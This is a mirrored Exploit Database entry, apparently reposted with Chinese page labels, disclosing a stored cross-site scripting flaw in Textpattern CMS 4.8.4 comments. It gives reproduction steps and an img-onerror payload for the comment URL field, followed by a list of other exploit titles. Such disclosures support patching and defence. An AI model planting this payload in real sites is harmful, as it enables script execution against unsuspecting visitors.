Textpattern CMS 4.8.4 – ‘Comments’ Persistent Cross-Site Scripting (XSS)

Exploit Database
15 阅读

作者： Tushar Vaidya

日期： 2021-03-04
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/49616/

# Exploit Title: Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)
# Date: 2021-03-04
# Exploit Author: Tushar Vaidya
# Vendor Homepage: https://textpattern.com
# Software Link: https://textpattern.com/start
# Version: v 4.8.4
# Tested on: Windows

Steps-To-Reproduce:
1. Login into Textpattern CMS admin panel.
2. Now go to the *Content > C**omments > Message*.
3. Now paste the below payload in the URL field.

Ba1man”><img src=x onerror=confirm(document.location)>

4. Now click on the *Save* button.
5. Now go to the https://site.com/articles/welcome-to-your-site#comments-head
5. The XSS will be triggered.

last Exploits
Textpattern CMS 4.8.4 – ‘Comments’ Persistent Cross-Site Scripting (XSS)的更多信息

Joomla! Component J-BusinessDirectory 4.9.7 – ‘type’ SQL Injection：
Primefaces 5.x – Remote Code Execution (Metasploit)：
FuseTalk Forums 3.2 – ‘windowed’ Cross-Site Scripting：
SN News 1.2 – ‘/admin/loger.php’ Authentication Bypass：
FiberHome LM53Q1 – Multiple Vulnerabilities：
WordPress Plugin Cookie Law Bar 1.2.1 – ‘clb_bar_msg’ Stored Cross-Site Scripting (XSS)：
Bludit 3-14-1 Plugin ‘UploadPlugin’ – Remote Code Execution (RCE) (Authenticated)：
PBBoard 2.1.4 – Local File Inclusion：